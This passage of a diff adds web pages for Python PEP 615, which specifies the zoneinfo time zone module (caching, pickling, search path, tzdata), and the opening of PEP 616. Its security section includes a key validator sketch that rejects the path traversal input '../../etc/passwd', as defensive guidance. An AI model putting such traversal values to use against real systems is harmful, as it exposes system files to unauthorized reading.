3.9
+
Post-History:
+
25-Feb-2020, 29-Mar-2020
+
Replaces:
+
431
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at zoneinfo.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This proposes adding a module, zoneinfo, to provide a concrete time zone +implementation supporting the IANA time zone database. By default, +zoneinfo will use the system’s time zone data if available; if no system +time zone data is available, the library will fall back to using the +first-party package tzdata, deployed on PyPI. [d]

+
+
+

Motivation

+

The datetime library uses a flexible mechanism to handle time zones: all +conversions and time zone information queries are delegated to an instance of a +subclass of the abstract datetime.tzinfo base class. [10] This allows +users to implement arbitrarily complex time zone rules, but in practice the +majority of users want support for just three types of time zone: [a]

+
    +
  1. UTC and fixed offsets thereof
  2. +
  3. The system local time zone
  4. +
  5. IANA time zones
  6. +
+

In Python 3.2, the datetime.timezone class was introduced to support the +first class of time zone (with a special datetime.timezone.utc singleton +for UTC).

+
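
For context, a fixed-offset zone from that first category can be constructed directly with the existing API:

+
from datetime import datetime, timedelta, timezone
+
+EST = timezone(timedelta(hours=-5), "EST")    # a fixed -05:00 offset
+dt = datetime(2020, 2, 22, 12, 0, tzinfo=EST)
+print(dt.astimezone(timezone.utc))            # 2020-02-22 17:00:00+00:00
+
+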

While there is still no “local” time zone, in Python 3.0 the semantics of naïve +time zones was changed to support many “local time” operations, and it is now +possible to get a fixed time zone offset from a local time:

+
>>> print(datetime(2020, 2, 22, 12, 0).astimezone())
+2020-02-22 12:00:00-05:00
+>>> print(datetime(2020, 2, 22, 12, 0).astimezone()
+...       .strftime("%Y-%m-%d %H:%M:%S %Z"))
+2020-02-22 12:00:00 EST
+>>> print(datetime(2020, 2, 22, 12, 0).astimezone(timezone.utc))
+2020-02-22 17:00:00+00:00
+
+
+

However, there is still no support for the time zones described in the IANA +time zone database (also called the “tz” database or the Olson database +[6]). The time zone database is in the public domain and is widely +distributed — it is present by default on many Unix-like operating systems. +Great care goes into the stability of the database: there are IETF RFCs both +for the maintenance procedures (RFC 6557) and for the compiled +binary (TZif) format (RFC 8536). As such, it is likely that adding +support for the compiled outputs of the IANA database will add great value to +end users even with the relatively long cadence of standard library releases.

+
+
+

Proposal

+

This PEP has three main concerns:

+
    +
  1. The semantics of the zoneinfo.ZoneInfo class (zoneinfo-class)
  2. +
  3. Time zone data sources used (data-sources)
  4. +
  5. Options for configuration of the time zone search path (search-path-config)
  6. +
+

Because of the complexity of the proposal, rather than having separate +“specification” and “rationale” sections the design decisions and rationales +are grouped together by subject.

+
+

The zoneinfo.ZoneInfo class

+
+

Constructors

+

The initial design of the zoneinfo.ZoneInfo class has several constructors.

+
ZoneInfo(key: str)
+
+
+

The primary constructor takes a single argument, key, which is a string +indicating the name of a zone file in the system time zone database (e.g. +"America/New_York", "Europe/London"), and returns a ZoneInfo +constructed from the first matching data source on search path (see the +data-sources section for more details). All zone information must be eagerly +read from the data source (usually a TZif file) upon construction, and may +not change during the lifetime of the object (this restriction applies to all +ZoneInfo constructors).

+

In the event that no matching file is found on the search path (either because +the system does not supply time zone data or because the key is invalid), the +constructor will raise a zoneinfo.ZoneInfoNotFoundError, which will be a +subclass of KeyError.

+
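
A brief sketch of handling that error (the failing key below is invented):

+
from zoneinfo import ZoneInfo, ZoneInfoNotFoundError
+
+try:
+    tz = ZoneInfo("Mars/Olympus_Mons")   # no such key on any search path
+except ZoneInfoNotFoundError:            # a subclass of KeyError
+    tz = ZoneInfo("UTC")                 # fall back to a key known to exist
+
+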

One somewhat unusual guarantee made by this constructor is that calls with +identical arguments must return identical objects. Specifically, for all +values of key, the following assertion must always be valid [b]:

+
a = ZoneInfo(key)
+b = ZoneInfo(key)
+assert a is b
+
+
+

The reason for this comes from the fact that the semantics of datetime +operations (e.g. comparison, arithmetic) depend on whether the datetimes +involved represent the same or different zones; two datetimes are in the same +zone only if dt1.tzinfo is dt2.tzinfo. [1] In addition +to the modest performance benefit from avoiding unnecessary proliferation of +ZoneInfo objects, providing this guarantee should minimize surprising +behavior for end users.

+

dateutil.tz.gettz has provided a similar guarantee since version 2.7.0 +(release March 2018). [16]

+
+

Note

+

The implementation may decide how to implement the cache behavior, but the +guarantee made here only requires that as long as two references exist to +the result of identical constructor calls, they must be references to the +same object. This is consistent with a reference counted cache where +ZoneInfo objects are ejected when no references to them exist (for +example, a cache implemented with a weakref.WeakValueDictionary) — it is +allowed but not required or recommended to implement this with a “strong” +cache, where all ZoneInfo objects are kept alive indefinitely.

+
+
ZoneInfo.no_cache(key: str)
+
+
+

This is an alternate constructor that bypasses the constructor’s cache. It is +identical to the primary constructor, but returns a new object on each call. +This is likely most useful for testing purposes, or to deliberately induce +“different zone” semantics between datetimes with the same nominal time zone.

+

Even if an object constructed by this method would have been a cache miss, it +must not be entered into the cache; in other words, the following assertion +should always be true:

+
>>> a = ZoneInfo.no_cache(key)
+>>> b = ZoneInfo(key)
+>>> a is not b
+
+
+
ZoneInfo.from_file(fobj: IO[bytes], /, key: str = None)
+
+
+

This is an alternate constructor that allows the construction of a ZoneInfo +object from any TZif byte stream. This constructor takes an optional +parameter, key, which sets the name of the zone, for the purposes of +__str__ and __repr__ (see Representations).

+

Unlike the primary constructor, this always constructs a new object. There are +two reasons that this deviates from the primary constructor’s caching behavior: +stream objects have mutable state and so determining whether two inputs are +identical is difficult or impossible, and it is likely that users constructing +from a file specifically want to load from that file and not a cache.

+

As with ZoneInfo.no_cache, objects constructed by this method must not be +added to the cache.

+
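
A sketch of this constructor in use; the TZif file path is an assumption of the example (any binary stream of TZif data would do):

+
from zoneinfo import ZoneInfo
+
+with open("/usr/share/zoneinfo/Europe/Berlin", "rb") as f:
+    berlin = ZoneInfo.from_file(f, key="Europe/Berlin")
+
+assert berlin is not ZoneInfo("Europe/Berlin")  # never cached, per the above
+
+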
+
+

Behavior during data updates

+

It is important that a given ZoneInfo object’s behavior not change during +its lifetime, because a datetime’s utcoffset() method is used in both +its equality and hash calculations, and if the result were to change during the +datetime’s lifetime, it could break the invariant for all hashable objects +[3] [4] that if x == y, it must also be true +that hash(x) == hash(y) [c].

+

Considering both the preservation of datetime’s invariants and the +primary constructor’s contract to always return the same object when called +with identical arguments, if a source of time zone data is updated during a run +of the interpreter, it must not invalidate any caches or modify any +existing ZoneInfo objects. Newly constructed ZoneInfo objects, however, +should come from the updated data source.

+

This means that the point at which the data source is updated for new +invocations of the ZoneInfo constructor depends primarily on the semantics +of the caching behavior. The only guaranteed way to get a ZoneInfo object +from an updated data source is to induce a cache miss, either by bypassing the +cache and using ZoneInfo.no_cache or by clearing the cache.

+
+

Note

+

The specified cache behavior does not require that the cache be lazily +populated — it is consistent with the specification (though not +recommended) to eagerly pre-populate the cache with time zones that have +never been constructed.

+
+
+
+

Deliberate cache invalidation

+

In addition to ZoneInfo.no_cache, which allows a user to bypass the +cache, ZoneInfo also exposes a clear_cache method to deliberately +invalidate either the entire cache or selective portions of the cache:

+
ZoneInfo.clear_cache(*, only_keys: Iterable[str]=None) -> None
+
+
+

If no arguments are passed, all caches are invalidated and the first call for +each key to the primary ZoneInfo constructor after the cache has been +cleared will return a new instance.

+
>>> NYC0 = ZoneInfo("America/New_York")
+>>> NYC0 is ZoneInfo("America/New_York")
+True
+>>> ZoneInfo.clear_cache()
+>>> NYC1 = ZoneInfo("America/New_York")
+>>> NYC0 is NYC1
+False
+>>> NYC1 is ZoneInfo("America/New_York")
+True
+
+
+

An optional parameter, only_keys, takes an iterable of keys to clear from +the cache, otherwise leaving the cache intact.

+
>>> NYC0 = ZoneInfo("America/New_York")
+>>> LA0 = ZoneInfo("America/Los_Angeles")
+>>> ZoneInfo.clear_cache(only_keys=["America/New_York"])
+>>> NYC1 = ZoneInfo("America/New_York")
+>>> LA1 = ZoneInfo("America/Los_Angeles")
+>>> NYC0 is NYC1
+False
+>>> LA0 is LA1
+True
+
+
+

Manipulation of the cache behavior is expected to be a niche use case; this +function is primarily provided to facilitate testing, and to allow users with +unusual requirements to tune the cache invalidation behavior to their needs.

+
+
+

String representation

+

The ZoneInfo class’s __str__ representation will be drawn from the +key parameter. This is partially because the key represents a +human-readable “name” of the string, but also because it is a useful parameter +that users will want exposed. It is necessary to provide a mechanism to expose +the key for serialization between languages and because it is also a primary +key for localization projects like CLDR (the Unicode Common Locale Data +Repository [5]).

+

An example:

+
>>> zone = ZoneInfo("Pacific/Kwajalein")
+>>> str(zone)
+'Pacific/Kwajalein'
+
+>>> dt = datetime(2020, 4, 1, 3, 15, tzinfo=zone)
+>>> f"{dt.isoformat()} [{dt.tzinfo}]"
+'2020-04-01T03:15:00+12:00 [Pacific/Kwajalein]'
+
+
+

When a key is not specified, the str operation should not fail, but +should return the object’s __repr__:

+
>>> zone = ZoneInfo.from_file(f)
+>>> str(zone)
+'ZoneInfo.from_file(<_io.BytesIO object at ...>)'
+
+
+

The __repr__ for a ZoneInfo is implementation-defined and not +necessarily stable between versions, but it must not be a valid ZoneInfo +key, to avoid confusion between a key-derived ZoneInfo with a valid +__str__ and a file-derived ZoneInfo which has fallen through to the +__repr__.

+

Since the use of str() to access the key provides no easy way to check +for the presence of a key (the only way is to try constructing a ZoneInfo +from it and detect whether it raises an exception), ZoneInfo objects will +also expose a read-only key attribute, which will be None in the event +that no key was supplied.

+
+
+

Pickle serialization

+

Rather than serializing all transition data, ZoneInfo objects will be +serialized by key, and ZoneInfo objects constructed from raw files (even +those with a value for key specified) cannot be pickled.

+

The behavior of a ZoneInfo object depends on how it was constructed:

+
    +
  1. ZoneInfo(key): When constructed with the primary constructor, a +ZoneInfo object will be serialized by key, and the deserializing process +will use the primary constructor, and thus it can be +expected to be the same object as other references to the same time zone. +For example, if europe_berlin_pkl is a string containing a pickle +constructed from ZoneInfo("Europe/Berlin"), one would expect the +following behavior:
    >>> a = ZoneInfo("Europe/Berlin")
    +>>> b = pickle.loads(europe_berlin_pkl)
    +>>> a is b
    +True
    +
    +
    +
  2. +
  3. ZoneInfo.no_cache(key): When constructed from the cache-bypassing +constructor, the ZoneInfo object will still be serialized by key, but +when deserialized, it will use the cache bypassing constructor. If +europe_berlin_pkl_nc is a string containing a pickle constructed from +ZoneInfo.no_cache("Europe/Berlin"), one would expect the following +behavior:
    >>> a = ZoneInfo("Europe/Berlin")
    +>>> b = pickle.loads(europe_berlin_pkl_nc)
    +>>> a is b
    +False
    +
    +
    +
  4. +
  5. ZoneInfo.from_file(fobj, /, key=None): When constructed from a file, the +ZoneInfo object will raise an exception on pickling. If an end user +wants to pickle a ZoneInfo constructed from a file, it is recommended +that they use a wrapper type or a custom serialization function: either +serializing by key or storing the contents of the file object and +serializing that.
  6. +
+

This method of serialization requires that the time zone data for the required +key be available on both the serializing and deserializing side, similar to the +way that references to classes and functions are expected to exist in both the +serializing and deserializing environments. It also means that no guarantees +are made about the consistency of results when unpickling a ZoneInfo +pickled in an environment with a different version of the time zone data.

+
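
A compact sketch of the first two behaviors, assuming the key is available in both the pickling and unpickling environments:

+
import pickle
+from zoneinfo import ZoneInfo
+
+nyc = pickle.loads(pickle.dumps(ZoneInfo("America/New_York")))
+assert nyc is ZoneInfo("America/New_York")        # by key, via the cache
+
+nc = pickle.loads(pickle.dumps(ZoneInfo.no_cache("America/New_York")))
+assert nc is not ZoneInfo("America/New_York")     # cache bypassed on load
+
+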
+
+
+

Sources for time zone data

+

One of the hardest challenges for IANA time zone support is keeping the data up +to date; between 1997 and 2020, there have been between 3 and 21 releases per +year, often in response to changes in time zone rules with little to no notice +(see [7] for more details). In order to keep up to date, +and to give the system administrator control over the data source, we propose +to use system-deployed time zone data wherever possible. However, not all +systems ship a publicly accessible time zone database — notably Windows uses a +different system for managing time zones — and so, where no system data is +available, zoneinfo falls back to an installable first-party package, +tzdata, available on PyPI. [d] If no system zoneinfo files are found but +tzdata is installed, the primary ZoneInfo constructor will use tzdata +as the time zone source.

+
+

System time zone information

+

Many Unix-like systems deploy time zone data by default, or provide a canonical +time zone data package (often called tzdata, as it is on Arch Linux, Fedora, +and Debian). Whenever possible, it would be preferable to defer to the system +time zone information, because this allows time zone information for all +language stacks to be updated and maintained in one place. Python distributors +are encouraged to ensure that time zone data is installed alongside Python +whenever possible (e.g. by declaring tzdata as a dependency for the +python package).

+

The zoneinfo module will use a “search path” strategy analogous to the +PATH environment variable or the sys.path variable in Python; the +zoneinfo.TZPATH variable will be a read-only (see search-path-config for +more details) ordered list of time zone data locations to search. When +creating a ZoneInfo instance from a key, the zone file will be constructed +from the first data source on the path in which the key exists, so for example, +if TZPATH were:

+
TZPATH = (
+    "/usr/share/zoneinfo",
+    "/etc/zoneinfo"
+    )
+
+
+

and (although this would be very unusual) /usr/share/zoneinfo contained +only America/New_York and /etc/zoneinfo contained both +America/New_York and Europe/Moscow, then +ZoneInfo("America/New_York") would be satisfied by +/usr/share/zoneinfo/America/New_York, while ZoneInfo("Europe/Moscow") +would be satisfied by /etc/zoneinfo/Europe/Moscow.

+

At the moment, on Windows systems, the search path will default to empty, +because Windows does not officially ship a copy of the time zone database. On +non-Windows systems, the search path will default to a list of the most +commonly observed search paths. Although this is subject to change in future +versions, at launch the default search path will be:

+
TZPATH = (
+    "/usr/share/zoneinfo",
+    "/usr/lib/zoneinfo",
+    "/usr/share/lib/zoneinfo",
+    "/etc/zoneinfo",
+)
+
+
+

This may be configured both at compile time or at runtime; more information on +configuration options at search-path-config.

+
+
+

The tzdata Python package

+

In order to ensure easy access to time zone data for all end users, this PEP +proposes to create a data-only package tzdata as a fallback for when system +data is not available. The tzdata package would be distributed on PyPI as +a “first party” package [d], maintained by the CPython development team.

+

The tzdata package contains only data and metadata, with no public-facing +functions or classes. It will be designed to be compatible with both newer +importlib.resources [11] access patterns and older +access patterns like pkgutil.get_data [12] .

+
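
A hedged sketch of such access; the sub-package layout used here (tzdata.zoneinfo.America) is an assumption about how the data files are shipped:

+
import importlib.resources
+
+# Read raw TZif bytes from the data package (layout assumed, see above).
+with importlib.resources.open_binary("tzdata.zoneinfo.America", "New_York") as f:
+    tzif_bytes = f.read()
+
+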

While it is designed explicitly for the use of CPython, the tzdata package +is intended as a public package in its own right, and it may be used as an +“official” source of time zone data for third party Python packages.

+
+
+
+

Search path configuration

+

The time zone search path is very system-dependent, and sometimes even +application-dependent, and as such it makes sense to provide options to +customize it. This PEP provides for three such avenues for customization:

+
    +
  1. Global configuration via a compile-time option
  2. +
  3. Per-run configuration via environment variables
  4. +
  5. Runtime configuration change via a reset_tzpath function
  6. +
+

In all methods of configuration, the search path must consist of only absolute, +rather than relative paths. Implementations may choose to ignore, warn or raise +an exception if a string other than an absolute path is found (and may make +different choices depending on the context — e.g. raising an exception when an +invalid path is passed to reset_tzpath but warning when one is included in +the environment variable). If an exception is not raised, any strings other +than an absolute path must not be included in the time zone search path.

+
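
A minimal sketch of that rule (not the reference implementation; the helper name is invented, and this variant warns where an implementation could equally ignore or raise):

+
import os
+import warnings
+
+def _filter_tzpath(candidates):
+    kept = []
+    for path in candidates:
+        if os.path.isabs(path):
+            kept.append(path)
+        else:
+            warnings.warn(f"Ignoring relative time zone path entry: {path!r}")
+    return tuple(kept)
+
+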
+

Compile-time options

+

It is most likely that downstream distributors will know exactly where their +system time zone data is deployed, and so a compile-time option +PYTHONTZPATH will be provided to set the default search path.

+

The PYTHONTZPATH option should be a string delimited by os.pathsep, +listing possible locations for the time zone data to be deployed (e.g. +/usr/share/zoneinfo).

+
+
+

Environment variables

+

When initializing TZPATH (and whenever reset_tzpath is called with no +arguments), the zoneinfo module will use the environment variable +PYTHONTZPATH, if it exists, to set the search path.
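
+
The print_tzpath.py helper used in the examples below is not specified by this PEP; a minimal version of it might look like this:

+
# print_tzpath.py -- a hypothetical helper for inspecting the search path
+import zoneinfo
+
+print(zoneinfo.TZPATH)
+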

+

PYTHONTZPATH is an os.pathsep-delimited string which replaces (rather +than augments) the default time zone path. Some examples of the proposed +semantics:

+
$ python print_tzpath.py
+("/usr/share/zoneinfo",
+ "/usr/lib/zoneinfo",
+ "/usr/share/lib/zoneinfo",
+ "/etc/zoneinfo")
+
+$ PYTHONTZPATH="/etc/zoneinfo:/usr/share/zoneinfo" python print_tzpath.py
+("/etc/zoneinfo",
+ "/usr/share/zoneinfo")
+
+$ PYTHONTZPATH="" python print_tzpath.py
+()
+
+
+

This provides no built-in mechanism for prepending or appending to the default +search path, as these use cases are likely to be somewhat more niche. It should +be possible to populate an environment variable with the default search path +fairly easily:

+
$ export DEFAULT_TZPATH=$(python -c \
+    "import os, zoneinfo; print(os.pathsep.join(zoneinfo.TZPATH))")
+
+
+
+
+

reset_tzpath function

+

zoneinfo provides a reset_tzpath function that allows for changing the +search path at runtime.

+
def reset_tzpath(
+    to: Optional[Sequence[Union[str, os.PathLike]]] = None
+) -> None:
+    ...
+
+
+

When called with a sequence of paths, this function sets zoneinfo.TZPATH to +a tuple constructed from the desired value. When called with no arguments or +None, this function resets zoneinfo.TZPATH to the default +configuration.

+

This is likely to be primarily useful for (permanently or temporarily) +disabling the use of system time zone paths and forcing the module to use the +tzdata package. It is not likely that reset_tzpath will be a common +operation, save perhaps in test functions sensitive to time zone configuration, +but it seems preferable to provide an official mechanism for changing this +rather than allowing a proliferation of hacks around the immutability of +TZPATH.
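
+
For example, a test sensitive to time zone configuration might temporarily pin the search path to a known data set (a sketch; the try/finally pattern here is illustrative rather than mandated by the PEP):

+
import zoneinfo
+
+def test_with_custom_tzdb():
+    zoneinfo.reset_tzpath(to=["/my/custom/tzdb"])  # absolute paths only
+    try:
+        ...  # assertions against zones shipped in /my/custom/tzdb
+    finally:
+        zoneinfo.reset_tzpath()  # restore the default configuration
+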

+
+

Caution

+

Although changing TZPATH during a run is a supported operation, users +should be advised that doing so may occasionally lead to unusual semantics, +and when making design trade-offs greater weight will be afforded to using +a static TZPATH, which is the much more common use case.

+
+

As noted in Constructors, the primary ZoneInfo constructor employs a cache +to ensure that two identically-constructed ZoneInfo objects always compare +as identical (i.e. ZoneInfo(key) is ZoneInfo(key)), and the nature of this +cache is implementation-defined. This means that the behavior of the +ZoneInfo constructor may be unpredictably inconsistent in some situations +when used with the same key under different values of TZPATH. For +example:

+
>>> reset_tzpath(to=["/my/custom/tzdb"])
+>>> a = ZoneInfo("My/Custom/Zone")
+>>> reset_tzpath()
+>>> b = ZoneInfo("My/Custom/Zone")
+>>> del a
+>>> del b
+>>> c = ZoneInfo("My/Custom/Zone")
+
+
+

In this example, My/Custom/Zone exists only in the /my/custom/tzdb and +not on the default search path. In all implementations the constructor for +a must succeed. It is implementation-defined whether the constructor for +b succeeds, but if it does, it must be true that a is b, because both +a and b are references to the same key. It is also +implementation-defined whether the constructor for c succeeds. +Implementations of zoneinfo may return the object constructed in previous +constructor calls, or they may fail with an exception.

+
+
+
+
+

Backwards Compatibility

+

This will have no backwards compatibility issues as it will create a new API.

+

With only minor modification, a backport of the zoneinfo module supporting Python 3.6+ could be created.

+

The tzdata package is designed to be “data only”, and should support any +version of Python that it can be built for (including Python 2.7).

+
+
+

Security Implications

+

This will require parsing zoneinfo data from disk, mostly from system locations +but potentially from user-supplied data. Errors in the implementation +(particularly the C code) could cause potential security issues, but there is +no special risk relative to parsing other file types.

+

Because the time zone data keys are essentially paths relative to some time +zone root, implementations should take care to avoid path traversal attacks. +Requesting keys such as ../../../path/to/something should not reveal +anything about the state of the file system outside of the time zone path.
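
+
One way an implementation might guard against this is to reject suspicious keys up front (a minimal, POSIX-oriented sketch; the _validate_key helper is hypothetical):

+
import posixpath
+
+def _validate_key(key):
+    # Reject absolute keys and any '..' traversal components.
+    if posixpath.isabs(key) or ".." in key.split("/"):
+        raise ValueError(f"Invalid time zone key: {key!r}")
+
+_validate_key("America/New_York")   # ok
+_validate_key("../../etc/passwd")   # raises ValueError
+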

+
+
+

Reference Implementation

+

An initial reference implementation is available at +https://github.com/pganssle/zoneinfo

+

This may eventually be converted into a backport for 3.6+.

+
+
+

Rejected Ideas

+
+

Building a custom tzdb compiler

+

One major concern with the use of the TZif format is that it does not actually +contain enough information to always correctly determine the value to return +for tzinfo.dst(). This is because for any given time zone offset, TZif +only marks the UTC offset and whether or not it represents a DST offset, but +tzinfo.dst() returns the total amount of the DST shift, so that the +“standard” offset can be reconstructed from datetime.utcoffset() - +datetime.dst(). The value to use for dst() can be determined by finding +the equivalent STD offset and calculating the difference, but the TZif format +does not specify which offsets form STD/DST pairs, and so heuristics must be +used to determine this.

+

One common heuristic — looking at the most recent standard offset — notably +fails in the case of the time zone changes in Portugal in 1992 and 1996, where +the “standard” offset was shifted by 1 hour during a DST transition, leading to +a transition from STD to DST status with no change in offset. In fact, it is +possible (though it has never happened) for a time zone to be created that is +permanently DST and has no standard offsets.
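
+
A sketch of that “most recent standard offset” heuristic, assuming the transitions are available as (utcoff_minutes, isdst) pairs (an illustrative data layout, not the TZif wire format):

+
from datetime import timedelta
+
+def dst_from_transitions(transitions, idx):
+    # Estimate dst() for the offset active at transitions[idx] by scanning
+    # backwards for the most recent standard (non-DST) offset.
+    utcoff, isdst = transitions[idx]
+    if not isdst:
+        return timedelta(0)
+    for prev_utcoff, prev_isdst in reversed(transitions[:idx]):
+        if not prev_isdst:
+            return timedelta(minutes=utcoff - prev_utcoff)
+    return timedelta(hours=1)  # no standard offset found; guess one hour
+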

+

Although this information is missing in the compiled TZif binaries, it is +present in the raw tzdb files, and it would be possible to parse this +information ourselves and create a more suitable binary format.

+

This idea was rejected for several reasons:

+
  1. It precludes the use of any system-deployed time zone information, which is usually present only in TZif format.
  2. The raw tzdb format, while stable, is less stable than the TZif format; some downstream tzdb parsers have already run into problems with old deployments of their custom parsers becoming incompatible with recent tzdb releases, leading to the creation of a “rearguard” format to ease the transition. [8]
  3. Heuristics currently suffice in dateutil and pytz for all known time zones, historical and present, and it is not very likely that new time zones will appear that cannot be captured by heuristics — though it is somewhat more likely that new rules that are not captured by the current generation of heuristics will appear; in that case, bugfixes would be required to accommodate the changed situation.
  4. The dst() method’s utility (and in fact the isdst parameter in TZif) is somewhat questionable to start with, as almost all the useful information is contained in the utcoffset() and tzname() methods, which are not subject to the same problems.
+

In short, maintaining a custom tzdb compiler or compiled package adds +maintenance burdens to both the CPython dev team and system administrators, and +its main benefit is to address a hypothetical failure that would likely have +minimal real world effects were it to occur.

+
+
+

Including tzdata in the standard library by default

+

Although PEP 453, which introduced the ensurepip +mechanism to CPython, provides a convenient template for a standard library +module maintained on PyPI, a potentially similar ensuretzdata mechanism is +somewhat less necessary, and would be complicated enough that it is considered +out of scope for this PEP.

+

Because the zoneinfo module is designed to use the system time zone data +wherever possible, the tzdata package is unnecessary (and may be +undesirable) on systems that deploy time zone data, and so it does not seem +critical to ship tzdata with CPython.

+

It is also not yet clear how these hybrid standard library / PyPI modules should be updated (other than pip, which has a natural mechanism for updates and notifications), and since it is not critical to the operation of the module, it seems prudent to defer any such proposal.

+
+
+

Support for leap seconds

+

In addition to time zone offset and name rules, the IANA time zone database +also provides a source of leap second data. This is deemed out of scope because +datetime.datetime currently has no support for leap seconds, and the +question of leap second data can be deferred until leap second support is +added.

+

The first-party tzdata package should ship the leap second data, even if it +is not used by the zoneinfo module.

+
+
+

Using a pytz-like interface

+

A pytz-like ([18]) interface was proposed in PEP 431, but was ultimately withdrawn / rejected for lack of support for ambiguous datetimes. PEP 495 added the fold attribute to address this problem; fold obviates the need for pytz’s non-standard tzinfo classes, and so a pytz-like interface is no longer necessary. [2]

+

The zoneinfo approach is more closely based on dateutil.tz, which +implemented support for fold (including a backport to older versions) just +before the release of Python 3.6.

+
+
+

Windows support via Microsoft’s ICU API

+

Windows does not ship the time zone database as TZif files, but as of Windows 10’s 2017 Creators Update, Microsoft has provided an API for interacting with the International Components for Unicode (ICU) project [13] [14], which includes an API for accessing time zone data — sourced from the IANA time zone database. [15]

+

Providing bindings for this would allow us to support Windows “out of the box” +without the need to install the tzdata package, but unfortunately the C +headers provided by Windows do not provide any access to the underlying time +zone data — only an API to query the system for transition and offset +information is available. This would constrain the semantics of any ICU-based +implementation in ways that may not be compatible with a non-ICU-based +implementation — particularly around the behavior of the cache.

+

Since it seems like ICU cannot be used as simply an additional data source for +ZoneInfo objects, this PEP considers the ICU support to be out of scope, and +probably better supported by a third-party library.

+
+
+

Alternative environment variable configurations

+

This PEP proposes to use a single environment variable: PYTHONTZPATH. +This is based on the assumption that the majority of users who would want to +manipulate the time zone path would want to fully replace it (e.g. “I know +exactly where my time zone data is”), and other use cases like prepending to +the existing search path would be less common.

+

There are several other schemes that were considered and rejected:

+
  1. Separate PYTHONTZPATH into two environment variables: DEFAULT_PYTHONTZPATH and PYTHONTZPATH, where PYTHONTZPATH would contain values to append (or prepend) to the default time zone path, and DEFAULT_PYTHONTZPATH would replace the default time zone path. This was rejected because it would likely lead to user confusion if the primary use case is to replace rather than augment.
  2. Adding either PYTHONTZPATH_PREPEND, PYTHONTZPATH_APPEND or both, so that users can augment the search path on either end without attempting to determine what the default time zone path is. This was rejected as likely to be unnecessary, and because it could easily be added in a backwards-compatible manner in future updates if there is much demand for such a feature.
  3. Use only the PYTHONTZPATH variable, but provide a custom special value that represents the default time zone path, e.g. <<DEFAULT_TZPATH>>, so that users could append to the time zone path; for example, PYTHONTZPATH=<<DEFAULT_TZPATH>>:/my/path would append /my/path to the end of the time zone path.

     One advantage of this scheme would be that it would add a natural extension point for specifying non-file-based elements on the search path, such as changing the priority of tzdata if it exists, or if native support for TZDIST were to be added to the library in the future.

     This was rejected mainly because these sorts of special values are not usually found in PATH-like variables, and the only currently proposed use case is a stand-in for the default TZPATH, which can be acquired by executing a Python program to query for the default value. An additional factor in rejecting this is that because PYTHONTZPATH accepts only absolute paths, any string that does not represent a valid absolute path is implicitly reserved for future use, so it would be possible to introduce these special values as necessary in a backwards-compatible way in future versions of the library.
+
+
+

Using the datetime module

+

One possible idea would be to add ZoneInfo to the datetime module, rather than giving it its own separate module. This PEP favors the use of a separate zoneinfo module, though a nested datetime.zoneinfo module was also under consideration.

+
+

Arguments against putting ZoneInfo directly into datetime

+

The datetime module is already somewhat crowded, as it has many classes with somewhat complex behavior — datetime.datetime, datetime.date, datetime.time, datetime.timedelta, datetime.timezone and datetime.tzinfo. The module’s implementation and documentation are already quite complicated, and it is probably beneficial to try not to compound the problem if it can be helped.

+

The ZoneInfo class is also in some ways different from all the other +classes provided by datetime; the other classes are all intended to be +lean, simple data types, whereas the ZoneInfo class is more complex: it is +a parser for a specific format (TZif), a representation for the information +stored in that format and a mechanism to look up the information in well-known +locations in the system.

+

Finally, while it is true that someone who needs the zoneinfo module also +needs the datetime module, the reverse is not necessarily true: many people +will want to use datetime without zoneinfo. Considering that +zoneinfo will likely pull in additional, possibly more heavy-weight +standard library modules, it would be preferable to allow the two to be +imported separately — particularly if potential “tree shaking” distributions +are in Python’s future. [9]

+

In the final analysis, it makes sense to keep zoneinfo a separate module +with a separate documentation page rather than to put its classes and functions +directly into datetime.

+
+
+

Using datetime.zoneinfo instead of zoneinfo

+

A more palatable configuration may be to nest zoneinfo as a module under +datetime, as datetime.zoneinfo.

+

Arguments in favor of this:

+
  1. It neatly namespaces zoneinfo together with datetime.
  2. The timezone class is already in datetime, and it may seem strange that some time zones are in datetime and others are in a top-level module.
  3. As mentioned earlier, importing zoneinfo necessarily requires importing datetime, so it is no imposition to require importing the parent module.
+

Arguments against this:

+
  1. In order to avoid forcing all datetime users to import zoneinfo, the zoneinfo module would need to be lazily imported, which means that end-users would need to explicitly import datetime.zoneinfo (as opposed to importing datetime and accessing the zoneinfo attribute on the module). This is the way dateutil works (all submodules are lazily imported), and it is a perennial source of confusion for end users.

     This confusing requirement from end-users can be avoided using a module-level __getattr__ and __dir__ per PEP 562, but this would add some complexity to the implementation of the datetime module. This sort of behavior in modules or classes tends to confuse static analysis tools, which may not be desirable for a library as widely used and critical as datetime.
  2. Nesting the implementation under datetime would likely require datetime to be reorganized from a single-file module (datetime.py) to a directory with an __init__.py. This is a minor concern, but the structure of the datetime module has been stable for many years, and it would be preferable to avoid churn if possible.

     This concern could be alleviated by implementing zoneinfo as _zoneinfo.py and importing it as zoneinfo from within datetime, but this does not seem desirable from an aesthetic or code organization standpoint, and it would preclude the version of nesting where end users are required to explicitly import datetime.zoneinfo.
+

This PEP takes the position that on balance it would be best to use a separate +top-level zoneinfo module because the benefits of nesting are not so great +that it overwhelms the practical implementation concerns.

+
+
+
+
+

Footnotes

+
+
+
[a]
+
The claim that the vast majority of users only want a few types of time +zone is based on anecdotal impressions rather than anything remotely +scientific. As one data point, dateutil provides many time zone types, +but user support mostly focuses on these three types.
+
+
[b]
+
The statement that identically constructed ZoneInfo objects should be +identical objects may be violated if the user deliberately clears the time +zone cache.
+
+
[c]
+
The hash value for a given datetime is cached on first calculation, so +we do not need to worry about the possibly more serious issue that a given +datetime object’s hash would change during its lifetime.
+
+
[d] (1, 2, 3)
+
The term “first party” here is distinguished from “third party” in that, +although it is distributed via PyPI and is not currently included in +Python by default, it is to be considered an official sub-project of +CPython rather than a “blessed” third-party package.
+
+
+
+

References

+ +
+

Other time zone implementations:

+ +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0615.rst

+

Last modified: 2024-06-01 20:10:03 GMT

+ +
+ +
+ \ No newline at end of file
diff --git a/pep-0616/index.html b/pep-0616/index.html new file mode 100644 index 00000000000..803beb5f3ec --- /dev/null +++ b/pep-0616/index.html @@ -0,0 +1,496 @@
+ PEP 616 – String methods to remove prefixes and suffixes | peps.python.org
+
+


+ + +
+
+
+

PEP 616 – String methods to remove prefixes and suffixes

+
+
Author:
+
Dennis Sweeney <sweeney.dennis650 at gmail.com>
+
Sponsor:
+
Eric V. Smith <eric at trueblade.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Mar-2020
+
Python-Version:
+
3.9
+
